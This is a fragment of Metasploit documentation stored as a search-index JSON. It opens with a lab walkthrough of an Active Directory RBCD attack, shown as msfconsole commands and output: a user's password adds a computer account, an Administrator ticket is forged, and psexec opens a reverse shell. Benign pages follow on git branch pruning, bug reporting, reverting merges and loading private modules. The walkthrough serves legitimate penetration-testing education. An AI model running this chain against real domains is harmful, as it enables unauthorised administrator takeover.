    "content": "Windows Server 2019 Domain Controller . In the following example the user MSFLAB\\sandy has write access to the computer account WS01$. The sandy account is used to add a new computer account to the domain, and then to configure WS01$ for delegation from the new computer account. The new computer account can then impersonate any user, including domain administrators, on WS01$ by authenticating with the Service for User (S4U) Kerberos extension. First create the computer account: . msf6 auxiliary(admin/dcerpc/samr_computer) &amp;gt; show options Module options (auxiliary/admin/dcerpc/samr_computer): Name Current Setting Required Description ---- --------------- -------- ----------- COMPUTER_NAME no The computer name COMPUTER_PASSWORD no The password for the new computer RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 445 yes The target port (TCP) SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as Auxiliary action: Name Description ---- ----------- ADD_COMPUTER Add a computer account msf6 auxiliary(admin/dcerpc/samr_computer) &amp;gt; set RHOSTS 192.168.159.10 RHOSTS =&amp;gt; 192.168.159.10 msf6 auxiliary(admin/dcerpc/samr_computer) &amp;gt; set SMBUser sandy SMBUser =&amp;gt; sandy msf6 auxiliary(admin/dcerpc/samr_computer) &amp;gt; set SMBPass Password1! SMBPass =&amp;gt; Password1! msf6 auxiliary(admin/dcerpc/samr_computer) &amp;gt; run [*] Running module against 192.168.159.10 [*] 192.168.159.10:445 - Using automatically identified domain: MSFLAB [+] 192.168.159.10:445 - Successfully created MSFLAB\\DESKTOP-QLSTR9NW$ [+] 192.168.159.10:445 - Password: A2HPEkkQzdxQirylqIj7BxqwB7kuUMrT [+] 192.168.159.10:445 - SID: S-1-5-21-3402587289-1488798532-3618296993-1655 [*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/samr_computer) &amp;gt; use auxiliary/admin/ldap/rbcd . 
Now use the RBCD module to read the current value of msDS-AllowedToActOnBehalfOfOtherIdentity: . msf6 auxiliary(admin/ldap/rbcd) &amp;gt; set USERNAME [email protected] BIND_DN =&amp;gt; [email protected] msf6 auxiliary(admin/ldap/rbcd) &amp;gt; set PASSWORD Password1! BIND_PW =&amp;gt; Password1! msf6 auxiliary(admin/ldap/rbcd) &amp;gt; set RHOSTS 192.168.159.10 RHOSTS =&amp;gt; 192.168.159.10 msf6 auxiliary(admin/ldap/rbcd) &amp;gt; set DELEGATE_TO WS01$ DELEGATE_TO =&amp;gt; WS01$ msf6 auxiliary(admin/ldap/rbcd) &amp;gt; read [*] Running module against 192.168.159.10 [+] Successfully bound to the LDAP server! [*] Discovering base DN automatically [+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local [*] The msDS-AllowedToActOnBehalfOfOtherIdentity field is empty. [*] Auxiliary module execution completed . Writing a new msDS-AllowedToActOnBehalfOfOtherIdentity value using the computer account created by admin/dcerpc/samr_computer: . msf6 auxiliary(admin/ldap/rbcd) &amp;gt; set DELEGATE_FROM DESKTOP-QLSTR9NW$ DELEGATE_FROM =&amp;gt; DESKTOP-QLSTR9NW$ msf6 auxiliary(admin/ldap/rbcd) &amp;gt; write [*] Running module against 192.168.159.10 [+] Successfully bound to the LDAP server! [*] Discovering base DN automatically [+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local [+] Successfully created the msDS-AllowedToActOnBehalfOfOtherIdentity attribute. [*] Auxiliary module execution completed . Reading the value of msDS-AllowedToActOnBehalfOfOtherIdentity to verify the value is updated: . msf6 auxiliary(admin/ldap/rbcd) &amp;gt; read [*] Running module against 192.168.159.10 [+] Successfully bound to the LDAP server! [*] Discovering base DN automatically [+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local [*] Allowed accounts: [*] DESKTOP-QLSTR9NW$ (S-1-5-21-3402587289-1488798532-3618296993-1655) [*] Auxiliary module execution completed msf6 auxiliary(admin/ldap/rbcd) &amp;gt; . 
Next we can use the auxiliary/admin/kerberos/get_ticket module to request a new S4U impersonation ticket for the Administrator account using the previously created machine account. For instance requesting a service ticket for SMB access: . msf6 auxiliary(admin/kerberos/get_ticket) &amp;gt; run action=GET_TGS rhost=192.168.159.10 username=DESKTOP-QLSTR9NW password=A2HPEkkQzdxQirylqIj7BxqwB7kuUMrT domain=msflab.local spn=cifs/ws01.msflab.local impersonate=Administrator [*] Running module against 192.168.159.10 [+] 192.168.159.10:88 - Received a valid TGT-Response [*] 192.168.159.10:88 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230222095449_default_192.168.159.10_mit.kerberos.cca_533930.bin [*] 192.168.159.10:88 - Getting TGS impersonating [email protected] (SPN: cifs/ws01.msflab.local) [+] 192.168.159.10:88 - Received a valid TGS-Response [*] 192.168.159.10:88 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230222095449_default_192.168.159.10_mit.kerberos.cca_962080.bin [+] 192.168.159.10:88 - Received a valid TGS-Response [*] 192.168.159.10:88 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230222095449_default_192.168.159.10_mit.kerberos.cca_614556.bin [*] Auxiliary module execution completed . The saved TGS can be used in a pass-the-ticket style attack. For instance using the exploit/windows/smb/psexec module for a reverse shell: . msf6 exploit(windows/smb/psexec) &amp;gt; run lhost=192.168.123.1 rhost=192.168.159.10 username=Administrator smb::auth=kerberos smb::rhostname=ws01.msflab.local domaincontrollerrhost=192.168.159.10 smbdomain=msflab.local smb::krb5ccname=/Users/user/.msf4/loot/20230222095449_default_192.168.159.10_mit.kerberos.cca_614556.bin [*] Started reverse TCP handler on 192.168.123.1:4444 [*] 192.168.159.10:445 - Connecting to the server... [*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445|msflab.local as user 'Administrator'... 
[*] 192.168.159.10:445 - Loaded a credential from ticket file: /Users/user/.msf4/loot/20230222095449_default_192.168.159.10_mit.kerberos.cca_614556.bin [*] 192.168.159.10:445 - Selecting PowerShell target [*] 192.168.159.10:445 - Executing the payload... [+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable... [*] Sending stage (175686 bytes) to 192.168.159.10 [*] Meterpreter session 3 opened (192.168.123.1:4444 -&amp;gt; 192.168.159.10:60755) at 2023-02-22 10:00:01 +0000 meterpreter &amp;gt; . ",
    "url": "/docs/pentesting/active-directory/kerberos/rbcd.html#scenarios",
    "relUrl": "/docs/pentesting/active-directory/kerberos/rbcd.html#scenarios"
  },"751": {
    "doc": "Resource-based constrained delegation (RBCD)",
    "title": "Resource-based constrained delegation (RBCD)",
    "content": " ",
    "url": "/docs/pentesting/active-directory/kerberos/rbcd.html",
    "relUrl": "/docs/pentesting/active-directory/kerberos/rbcd.html"
  },"752": {
    "doc": "Remote Branch Pruning",
    "title": "Back up the repo",
    "content": "Clone a new metasploit-framework.git repository: . todb@presto:~/github/todb-r7$ git clone github_r7:rapid7/metasploit-framework.git msf-backup.git . Go there and check out every remote branch we’ve got. That way, if you screw up and delete something important, you can add it back in later from this backup clone. todb@presto:~/github/todb-r7$ cd msf-backup.git todb@presto:~/github/todb-r7/msf-backup.git$ for b in `git branch -r | grep -v \"HEAD -&amp;gt; origin\" | sed 's/^ origin\\///'`; do git checkout -b $b --track origin/$b; done . Tarball it out of the way (create the archive, then remove the working clone). todb@presto:~/github/todb-r7$ cd .. todb@presto:~/github$ tar zcvf msf-backup.git.tar.gz msf-backup.git todb@presto:~/github$ rm -rf msf-backup.git . ",
    "url": "/docs/development/get-started/git/remote-branch-pruning.html#back-up-the-repo",
    "relUrl": "/docs/development/get-started/git/remote-branch-pruning.html#back-up-the-repo"
  },"753": {
    "doc": "Remote Branch Pruning",
    "title": "Make a new clone",
    "content": "Now, clone metasploit again. I do this because I have like 20 remotes to deal with on my “real” clone and I don’t want to have to grep through all my origin vs non-origin stuff. mazikeen:./rapid7$ git clone github_r7:rapid7/metasploit-framework.git msf-prune . Now start figuring out what branches to delete. First, wipe out any remote-tracking branches whose upstream branch no longer exists. Usually that’s not a lot. mazikeen:./msf-prune$ git remote prune origin . Next, take a look at what’s already merged and what’s not. We can drop most of the merged stuff right away. mazikeen:./msf-prune$ git branch -r --merged mazikeen:./msf-prune$ git branch -r --no-merged . That gives a pretty good idea of how many branches we’re talking about. ",
    "url": "/docs/development/get-started/git/remote-branch-pruning.html#make-a-new-clone",
    "relUrl": "/docs/development/get-started/git/remote-branch-pruning.html#make-a-new-clone"
  },"754": {
    "doc": "Remote Branch Pruning",
    "title": "Start deleting old, merged branches",
    "content": "Here’s a one-liner, lightly modified from http://stackoverflow.com/questions/2514172/listing-each-branch-and-its-last-revisions-date-in-git#2514279 which lists all remote merged branches in date order. mazikeen:./msf-prune$ for k in `git branch -r --merged |grep -v \"HEAD ->\" | sed s/^..//`; do echo -e `git log -1 --pretty=format:\"%Cgreen%ci %Cblue%cr%Creset\" $k --`\\\\t\"$k\";done | sort . Count off how many you want to keep at the end, do the arithmetic, and tack on another couple of pipes to catch everything that’s more than two weeks old (sort puts the oldest last-commit dates first, so head keeps the oldest branches). These are the merged branches that nobody’s likely to miss. mazikeen:./msf-prune$ for k in `git branch -r --merged |grep -v \"HEAD ->\" | sed s/^..//`; do echo -e `git log -1 --pretty=format:\"%Cgreen%ci %Cblue%cr%Creset\" $k --`\\\\t\"$k\";done | sort | head -45 | sed \"s/^.*origin\\///\" > /tmp/merged_to_delete.txt . Pull the trigger: . mazikeen:./msf-prune$ for b in `cat /tmp/merged_to_delete.txt`; do echo Deleting $b && git push origin :$b; done . Note that we still have our tarball, so if we need to reinstate any of these branches, we just need to re-push. ",
    "url": "/docs/development/get-started/git/remote-branch-pruning.html#start-deleting-old-merged-branches",
    "relUrl": "/docs/development/get-started/git/remote-branch-pruning.html#start-deleting-old-merged-branches"
  },"755": {
    "doc": "Remote Branch Pruning",
    "title": "Repeat for the unmerged branches",
    "content": "Pretty much the same as above, but use --no-merged instead of --merged and allow for older unmerged branches (say, 2 months). ",
    "url": "/docs/development/get-started/git/remote-branch-pruning.html#repeat-for-the-unmerged-branches",
    "relUrl": "/docs/development/get-started/git/remote-branch-pruning.html#repeat-for-the-unmerged-branches"
  },"756": {
    "doc": "Remote Branch Pruning",
    "title": "Tell people about it.",
    "content": "Sometimes, some people may run into sync problems with these missing branches and need to git remote prune origin themselves. Alternatively, they may want to look into these branches again – especially the unmerged ones. So, let people know that you just did this on the metasploit-hackers list and the Freenode IRC channel. If someone wants an old branch back, just go to your backup clone and push it back up as you would any branch: git checkout branchname && git push origin branchname. No problem. ",
    "url": "/docs/development/get-started/git/remote-branch-pruning.html#tell-people-about-it",
    "relUrl": "/docs/development/get-started/git/remote-branch-pruning.html#tell-people-about-it"
  },"757": {
    "doc": "Remote Branch Pruning",
    "title": "Remote Branch Pruning",
    "content": "Since we have a lot of people creating and merging branches on the Metasploit GitHub repository, we need to periodically get rid of old and abandoned branches. Here’s my technique: . ",
    "url": "/docs/development/get-started/git/remote-branch-pruning.html",
    "relUrl": "/docs/development/get-started/git/remote-branch-pruning.html"
  },"758": {
    "doc": "Reporting a Bug",
    "title": "Metasploit Bug Reporting",
    "content": "Metasploit gets hundreds of issue reports every year on our issue tracker. Some issues aren’t bug reports at all, but instead requests for new features or questions about Metasploit usage. We appreciate feature or enhancement requests, and you should feel free to keep submitting those to our issue tracker. Some questions, such as whether an odd error or behavior is intended, are okay to submit to the issue tracker as well. Other questions, such as basic support requests or questions on beginning Framework usage, are better to ask the community on Slack. If you believe you have discovered a legitimate bug in Metasploit Framework, you should open a bug report on our issue tracker. The rest of this page will discuss how to submit detailed, useful bug reports so we can understand and triage your issue as quickly as possible. But first…two important exceptions to bug/issue reports. ",
    "url": "/docs/using-metasploit/getting-started/reporting-a-bug.html#metasploit-bug-reporting",
    "relUrl": "/docs/using-metasploit/getting-started/reporting-a-bug.html#metasploit-bug-reporting"
  },"759": {
    "doc": "Reporting a Bug",
    "title": "When NOT to use Metasploit’s issue tracker",
    "content": "NOTE: There are two situations where, even if you have found what you know is a bug, you should not open a bug report on our public issue tracker. | You should not open a bug report on Metasploit Framework’s issue tracker if you are a Metasploit Pro customer. | You should not open a bug report when you have found a security issue with Metasploit itself. | . Metasploit Pro Customers . If you are a Metasploit Pro customer, you can log in to Rapid7’s customer support portal here. You are also able to reach out to your CSM or support representative if you prefer. To provide a consistent customer experience, Metasploit Framework community members, committers, and open-source developers do not offer support for commercial Rapid7 products. Rapid7’s support resources and team members are well-equipped to handle your Metasploit Pro support needs! . Security Issues . If you have a security issue with Metasploit itself, you should email [email protected] or let us know here. Rapid7’s disclosure policy is here. In general, our security teams are happy to give you credit, inform you about progress, and explore related issues with you if you’d like. They’re also happy to keep you anonymous if that’s what you prefer. All of this is significantly easier if you report security issues in a manner that lets our teams quickly work with you to understand the problem! Clear communication and coordinated disclosure give us the best chance of fixing any security issues quickly and protecting users. Now on to the good stuff! The Metasploit development community has read thousands of bug reports over the past 15 years, and a well-written bug report makes fixing bugs much faster and easier. In fact, in our experience, how quickly we can understand and fix an issue has more to do with bug report quality than the complexity of the bug itself. ",
    "url": "/docs/using-metasploit/getting-started/reporting-a-bug.html#when-not-to-use-metasploits-issue-tracker",
    "relUrl": "/docs/using-metasploit/getting-started/reporting-a-bug.html#when-not-to-use-metasploits-issue-tracker"
  },"760": {
    "doc": "Reporting a Bug",
    "title": "General Rules",
    "content": ". | Ensure the platform you’re reporting the issue for is supported. We do not, for instance, support Termux currently. If your platform is not officially supported, the community may still have resources to help, but you should search for and ask about those outside Metasploit’s issue tracker. | When possible, it helps if you are running the latest stable version of Metasploit Framework, or the latest release of Kali, BlackArch Linux, or your other favorite security distribution that ships with Metasploit. Metasploit’s nightly installers are here and typically offer the latest Framework release. | Review our code of conduct before submitting issues. | Use a specific title so we can understand immediately which part of Metasploit is causing the unexpected behavior. “NoMethodError raised on smb_login module” is a great title. “Problem with Metasploit target” is not. | Redact any private or sensitive data, such as target IPs or URLs, passwords, or personally identifying information. | Please don’t comment on closed issues; instead, open a new issue and link to any previous relevant issues. | . ",
    "url": "/docs/using-metasploit/getting-started/reporting-a-bug.html#general-rules",
    "relUrl": "/docs/using-metasploit/getting-started/reporting-a-bug.html#general-rules"
  },"761": {
    "doc": "Reporting a Bug",
    "title": "Information to Include",
    "content": "We ask for several different pieces of information when users report issues in Metasploit. As of June 2020, our core engineering team in Belfast is developing a debug command that will automatically give you all the information we require when you encounter an issue and then run the command in msfconsole. For now, the following information ensures that we can more effectively triage and address bugs. If you do not provide this information, it is likely that response time will be significantly longer! . Steps to reproduce . What did you do to get the results you got? Can you give us step-by-step instructions to get the same results you got? Are you able to consistently reproduce the issue in your own environment? . Which OS are you using? What do we need to know about your environment and/or target? . Tell us which operating system you’re using and any relevant information about your setup. If the module or feature you’re having trouble with requires any external dependencies, check whether they are installed, and (if not) whether installing them could solve your problem. If you’re having problems with a target (victim), tell us the target operating system and service versions. (Please ensure you’ve redacted any private or sensitive data!) If you’re testing a module in a lab or virtual environment, we would appreciate as much data about the target as you can provide. This means exact versions of the target including patch levels, pcaps if you can capture them, and any kind of logging inside or outside of Framework. We will often ask for the framework.log. Expected behavior . What should happen? If what you’re trying to do used to work but no longer does, what was the behavior you encountered before you ran into a problem? . Current behavior . What happens now? Please give us as many technical details as possible. 
Once again, we also strongly recommend that you send us any relevant logs and/or stack traces. In case you haven’t noticed by now, we absolutely love logs and screen captures, and your including them will make us happy. Metasploit version . Get this with the version command in msfconsole (or git log -1 --pretty=oneline for a source install). Did you install Metasploit with… . | Kali package via apt | Omnibus installer (nightly) | Commercial installer (from https://www.rapid7.com/products/metasploit/download/) | Source install (please specify Ruby version) | . This list isn’t intended to be exhaustive - it’s simply the bare minimum set of details we need to reproduce and diagnose your bug. You should feel free to include as much detailed information as you need to help us understand how you got the results you did. ",
    "url": "/docs/using-metasploit/getting-started/reporting-a-bug.html#information-to-include",
    "relUrl": "/docs/using-metasploit/getting-started/reporting-a-bug.html#information-to-include"
  },"762": {
    "doc": "Reporting a Bug",
    "title": "Avoid Duplicates",
    "content": "You may not be the first person to notice the problem you’re seeing as a Framework user, and the more bug reports we get, the more difficult it is to sort through them all for easy fixes or high-priority issues. Here are some ways to help a previously-reported bug get noticed more quickly and prioritized (if necessary). | Having a problem with a module? Try searching that module’s name to see if anyone else has reported (or fixed!) your problem recently. | Getting a strange error and not sure what it means? Search for the error to see if others have had or addressed the same problem you are facing. | Pro tip: Search both open and closed issues to see if what you’re reporting was resolved (in which case you might simply need to update to a later version of Metasploit) or if there’s a workaround someone else has discovered that might help you while we get to your issue. | If you DO discover that someone else has already reported the issue you’re experiencing, please do update that issue with any new information - for instance, that you’re experiencing the issue on a different OS or in a different version of Metasploit than what the original issue reports described. | If you find closed issues or resolved bugs that describe a problem you’re having on a later version of Metasploit, that could indicate a regression (old bugs that have been reintroduced). It helps us if you note this in your issue report. Fixes for regressions can be fast, so making note of possible regressions is useful. | Finally, you might find a bug that’s been rejected or closed without resolution. In many of these cases, the problem is something external to Metasploit: user error, configuration issues, known incompatibilities, etc. If you think that the original resolution was in error or incomplete, open a new issue report and refer to any related issue reports. | . ",
    "url": "/docs/using-metasploit/getting-started/reporting-a-bug.html#avoid-duplicates",
    "relUrl": "/docs/using-metasploit/getting-started/reporting-a-bug.html#avoid-duplicates"
  },"763": {
    "doc": "Reporting a Bug",
    "title": "Other Notes",
    "content": ". | Networking is hard, as we’ve often said even among ourselves! You might want to see if your network configuration is unusual in any way, or do a regular old internet search to check whether your config might be the problem. | Antivirus frequently causes strange behavior. Ensure antivirus is disabled on your system or in any VMs where you’re using Metasploit. | GitHub pull requests frequently contain a LOT of conversation and context. If a bug already has a pull request associated with it, check the pull request conversation for other information that might be useful to you. | . ",
    "url": "/docs/using-metasploit/getting-started/reporting-a-bug.html#other-notes",
    "relUrl": "/docs/using-metasploit/getting-started/reporting-a-bug.html#other-notes"
  },"764": {
    "doc": "Reporting a Bug",
    "title": "PRs Accepted!",
    "content": "If you’re a superhero and you figured out the root cause of a bug AND found a way to fix it, you can send your Metasploit fixes and improvements our way! The best way to get your fix into Metasploit quickly is to patch your own fork and submit a pull request to Metasploit. You get extra gratitude from all of us when you do this, and you’ll also get a shout-out in the weekly Metasploit wrap-up. You can find a guide on setting up your own Metasploit Development Environment here. ",
    "url": "/docs/using-metasploit/getting-started/reporting-a-bug.html#prs-accepted",
    "relUrl": "/docs/using-metasploit/getting-started/reporting-a-bug.html#prs-accepted"
  },"765": {
    "doc": "Reporting a Bug",
    "title": "Public Discussion",
    "content": "Some projects and companies don’t like discussing bugs in the bug report itself. Some even have policies of not doing this. Metasploit is not one of those projects. We greatly prefer public communication over private communication because it makes community knowledge accessible and searchable to everyone. That said, if you have specific privacy or security concerns, we’re always happy to speak privately. You can get in touch with us at [email protected]. ",
    "url": "/docs/using-metasploit/getting-started/reporting-a-bug.html#public-discussion",
    "relUrl": "/docs/using-metasploit/getting-started/reporting-a-bug.html#public-discussion"
  },"766": {
    "doc": "Reporting a Bug",
    "title": "Resolved Bugs",
    "content": "Your bug should be considered “Resolved” once there’s a fix landed in the Metasploit-Framework master branch. People who track that branch will have the fix available quickly. It may take other distributions that include Metasploit (e.g., Kali) a few days to pull in fixes, depending on their individual release cadences. Thanks for helping us get to diagnoses and resolutions quickly and efficiently for all Framework users! . ",
    "url": "/docs/using-metasploit/getting-started/reporting-a-bug.html#resolved-bugs",
    "relUrl": "/docs/using-metasploit/getting-started/reporting-a-bug.html#resolved-bugs"
  },"767": {
    "doc": "Reporting a Bug",
    "title": "Reporting a Bug",
    "content": " ",
    "url": "/docs/using-metasploit/getting-started/reporting-a-bug.html",
    "relUrl": "/docs/using-metasploit/getting-started/reporting-a-bug.html"
  },"768": {
    "doc": "Rolling back merges",
    "title": "What’s a bad merge?",
    "content": ". | Anything that causes our GitHub Actions to fail consistently. | Anything that hits untested code that otherwise causes problems with msfconsole, msfcli, msfvenom, and other console commands. | . Sometimes, GitHub Actions might choke up, due to network weather. Every build is a fresh clone, and all gems have to be reinstalled every time. Also, some rspec tests require network connections to assets on the Internet. Sometimes, GitHub Actions servers are under a lot of load, and builds time out. The best way to diagnose these problems is simply to restart the build. Note, only Committers have rights to do this. If that doesn’t clear things up, or if it’s obvious that there are real failures (since you’ve read the rspec results and have read the tests), the first order of business is to undo your bad commit. Note: in branches other than master, you can usually just fix things normally with new commits. There are plenty of “whoops” commit messages in our history. ",
    "url": "/docs/development/maintainers/process/rolling-back-merges.html#whats-a-bad-merge",
    "relUrl": "/docs/development/maintainers/process/rolling-back-merges.html#whats-a-bad-merge"
  },"769": {
    "doc": "Rolling back merges",
    "title": "A merge revert example",
    "content": "Once, there was a bad merge on PR #2320. The fellow landing this pull request ran into a merge conflict while landing, thought he fixed it, and pushed the results, which ended up breaking about a dozen Rspec tests. Whoops. That was a bad merge. PR #2624 fixed it. Here’s the procedure used. Check out the bad merge tip. These commands will put the local repo back to the bad merge, and create a local branch as such: . git checkout 3996557 git checkout -b bad-merge . You can inspect exactly what commits are contained in this merge with the following: . git log bad-merge...bad-merge~ --oneline . Like so: . $ git log bad-merge...bad-merge~ --oneline 3996557 Fix conflcit lib/msf/util/exe.rb 6296c4f Merge pull request #9 from tabassassin/retab/pr/2320 d0a3ea6 Retab changes for PR #2320 bff7d0e Merge for retab 4c9e6a8 Default to exe-small . The syntax is a little wacky, but this is saying, “Show me all the commits that are reachable from bad-merge but not from one back from bad-merge (in other words, from right before bad-merge was merged).” That’s what the tilde (~) means: the commit’s first parent. You could also use bad-merge^ or bad-merge^1; they’re all equivalent. You can see the diff with the following command. Note the reverse placement of the bad-merge and bad-merge~ commit points! . git diff bad-merge~ bad-merge . Take a look at that, confirm that yes, this is exactly what you want to revert, and then pull the trigger. Revert the merge . git revert -m 1 bad-merge . The -m 1 bit is important: a merge commit has two parents, and -m 1 tells git revert to treat the first parent (the master side) as the mainline, so the result is the tree as it was before the merge, with the other side’s changes backed out. I have never had reason to revert a merge and throw out the mainline side instead (-m 2), but I imagine it comes up often enough for other people to not have it be the default behavior. Note that this does /not/ reach into the repo and change history; for that, you would need to git push --force, and you never want to do that on the master branch. 
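The whole sequence played out on a throwaway repository, as an added example that is not part of the Metasploit docs: the file names, the topic branch and the commit messages are made up, a bad-merge tag stands in for the bad-merge branch created above, and git is assumed to be on the PATH. It shows the commit set that bad-merge...bad-merge~ reports, then the revert with -m 1, and checks that the merged-in file is gone while every earlier commit is still in history.

```shell
#!/bin/sh
# Added example (not from the Metasploit docs): replay a bad merge and its
# revert on a scratch repository so the effect of git revert -m 1 is visible.
# Assumes git is installed; file names, branch and messages are invented.

demo_revert_merge() {
  dir=$(mktemp -d) || return 1
  (
    set -e
    cd $dir
    git init -q
    git symbolic-ref HEAD refs/heads/master
    git config user.name 'Example Committer'
    git config user.email 'committer@example.invalid'

    # 1. A clean starting point on master.
    mkdir lib
    echo 'module Msf; end' > lib/msf.rb
    git add lib && git commit -q -m 'Initial commit'

    # 2. A topic branch whose content we will later want to back out.
    git checkout -q -b topic
    echo 'puts :broken' > lib/exe.rb
    git add lib && git commit -q -m 'Default to exe-small'

    # 3. Land it with a merge commit and mark that commit as bad-merge
    #    (the docs check out the hash and branch from it; a tag is equivalent).
    git checkout -q master
    git merge -q --no-ff -m 'Merge topic branch' topic
    git tag bad-merge

    # 4. What the docs inspect: commits reachable from bad-merge but not from
    #    its first parent. Here that is the merge commit plus the topic commit.
    merged=$(git log bad-merge...bad-merge~ --oneline | wc -l | tr -d ' ')

    # 5. Revert the merge, keeping the first parent (master) as the mainline.
    #    Add -S here to GPG-sign the revert; omitted because there is no key.
    git revert --no-edit -m 1 bad-merge >/dev/null

    # 6. History is intact (one more commit, merge commit still resolvable)
    #    but the file that came in through the merge is gone from the tree.
    commits=$(git rev-list --count HEAD)
    if [ -e lib/exe.rb ]; then present=yes; else present=no; fi
    git rev-parse --verify -q bad-merge^{commit} >/dev/null
    echo ok commits=$commits merged=$merged exe_present=$present
  )
  status=$?
  rm -rf $dir
  return $status
}

demo_revert_merge
```

Expected output is ok commits=4 merged=2 exe_present=no: the base commit, the topic commit, the merge and the revert are all still reachable from master, the log over bad-merge...bad-merge~ lists exactly the two commits the merge brought in, and lib/exe.rb no longer exists. Nothing was rewritten.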
Instead, you are generating a new commit that reverses the contents of the merge commit. As usual, you will want to edit the commit message to be meaningful – mention the affected commit hash and the affected pull request. Current versions of git revert accept -S (--gpg-sign) directly; if yours does not, run git commit -S --amend after the revert to sign it. Create a new PR. You will now create a new PR with your revert commit. That’s simple enough. Again, be sure that the affected PRs are also informed; they may think their material landed, and while it technically did, it’s no longer there; they will need to open new PRs and figure out how to resubmit their changes (hopefully, this time without causing merge conflicts). Bug the committers until your revert lands. Until your revert commit lands, master will remain broken, so dealing with this situation should be blocking basically anything else. Be vocal. ",
    "url": "/docs/development/maintainers/process/rolling-back-merges.html#a-merge-revert-example",
    "relUrl": "/docs/development/maintainers/process/rolling-back-merges.html#a-merge-revert-example"
  },"770": {
    "doc": "Rolling back merges",
    "title": "That’s it!",
    "content": "If you have suggestions for fixes on this page, please bother @todb-r7 with them. ",
    "url": "/docs/development/maintainers/process/rolling-back-merges.html#thats-it",
    "relUrl": "/docs/development/maintainers/process/rolling-back-merges.html#thats-it"
  },"771": {
    "doc": "Rolling back merges",
    "title": "Rolling back merges",
    "content": "Since the Metasploit-framework repository’s master branch is the bleeding edge of development, occasionally mistakes happen. This page will attempt to give some guidance on how to roll back a bad merge. ",
    "url": "/docs/development/maintainers/process/rolling-back-merges.html",
    "relUrl": "/docs/development/maintainers/process/rolling-back-merges.html"
  },"772": {
    "doc": "Running Private Modules",
    "title": "Mirror the “real” Metasploit module paths",
    "content": "You must first set up a directory structure that fits with Metasploit’s expectations of path names. What this typically means is that you should first create an “exploits” directory structure, like so: . mkdir -p $HOME/.msf4/modules/exploits . If you are using auxiliary or post modules, or are writing payloads you’ll want to mkdir those as well. ",
    "url": "/docs/using-metasploit/intermediate/running-private-modules.html#mirror-the-real-metasploit-module-paths",
    "relUrl": "/docs/using-metasploit/intermediate/running-private-modules.html#mirror-the-real-metasploit-module-paths"
  },"773": {
    "doc": "Running Private Modules",
    "title": "Create an appropriate category",
    "content": "Modules are sorted by (somewhat arbitrary) categories. These can be anything you like; I usually use test or private, but if you are developing a module with an eye toward providing it to the main Metasploit distribution, you will want to mirror the real module path. For example: . mkdir -p $HOME/.msf4/modules/exploits/windows/fileformat . … if you are developing a file format exploit for Windows. ",
    "url": "/docs/using-metasploit/intermediate/running-private-modules.html#create-an-appropriate-category",
    "relUrl": "/docs/using-metasploit/intermediate/running-private-modules.html#create-an-appropriate-category"
  },"774": {
    "doc": "Running Private Modules",
    "title": "Create the module",
    "content": "Once you have a directory to place it in, feel free to download or start writing your module. ",
    "url": "/docs/using-metasploit/intermediate/running-private-modules.html#create-the-module",
    "relUrl": "/docs/using-metasploit/intermediate/running-private-modules.html#create-the-module"
  },"775": {
    "doc": "Running Private Modules",
    "title": "Using Python/Go modules",
    "content": "External modules, most commonly written in Python/Go, need to additionally be marked as executable in order to be loaded by Metasploit. For full details: . | Writing External Python Modules | Writing External GoLang Modules | . ",
    "url": "/docs/using-metasploit/intermediate/running-private-modules.html#using-pythongo-modules",
    "relUrl": "/docs/using-metasploit/intermediate/running-private-modules.html#using-pythongo-modules"
  },"776": {
    "doc": "Running Private Modules",
    "title": "Test it all out",
    "content": "If you already have msfconsole running, use a reload_all command to pick up your new modules. If not, just start msfconsole and they’ll be picked up automatically. If you’d like to test with something generic, I have a module posted up as a gist, here: https://gist.github.com/todb-r7/5935519, so let’s give it a shot: . mkdir -p $HOME/.msf4/modules/exploits/test curl -Lo ~/.msf4/modules/exploits/test/test_module.rb https://gist.github.com/todb-r7/5935519/raw/17f7e40ab9054051c1f7e0655c6f8c8a1787d4f5/test_module.rb todb@ubuntu:~$ mkdir -p $HOME/.msf4/modules/exploits/test todb@ubuntu:~$ curl -Lo ~/.msf4/modules/exploits/test/test_module.rb https://gist.github.com/todb-r7/5935519/raw/6e5d2da61c82b0aa8cec36825363118e9dd5f86b/test_module.rb % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 1140 0 1140 0 0 3607 0 --:--:-- --:--:-- --:--:-- 7808 . Then, in my msfconsole window: . msf > reload_all [*] Reloading modules from all module paths... IIIIII dTb.dTb _.---._ II 4' v 'B .'\"\".'/|\\`.\"\"'. II 6.P : .' / | \\ `. : II 'T;.;P' '.' / | \\ `.' II 'T; ;P' `. / | \\ .' IIIIII 'YvP' `-.__|__.-' I love shells --egypt =[ metasploit v4.6.2-2013052901 [core:4.6 api:1.0] + -- --=[ 1122 exploits - 707 auxiliary - 192 post + -- --=[ 307 payloads - 30 encoders - 8 nops msf > use exploit/test/test_module msf exploit(test_module) > info Name: Fake Test Module Module: exploit/test/test_module Version: 0 Platform: Windows Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Provided by: todb <[email protected]> Available targets: Id Name -- ---- 0 Universal Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- DATA Hello, world! yes The output data Payload information: Description: If this module loads, you know you're doing it right. 
References: https://cvedetails.com/cve/1970-0001/ msf exploit(test_module) > exploit [*] Started reverse handler on 192.168.145.1:4444 [+] Hello, world! msf exploit(test_module) > . ",
    "url": "/docs/using-metasploit/intermediate/running-private-modules.html#test-it-all-out",
    "relUrl": "/docs/using-metasploit/intermediate/running-private-modules.html#test-it-all-out"
  },"777": {
    "doc": "Running Private Modules",
    "title": "Troubleshooting",
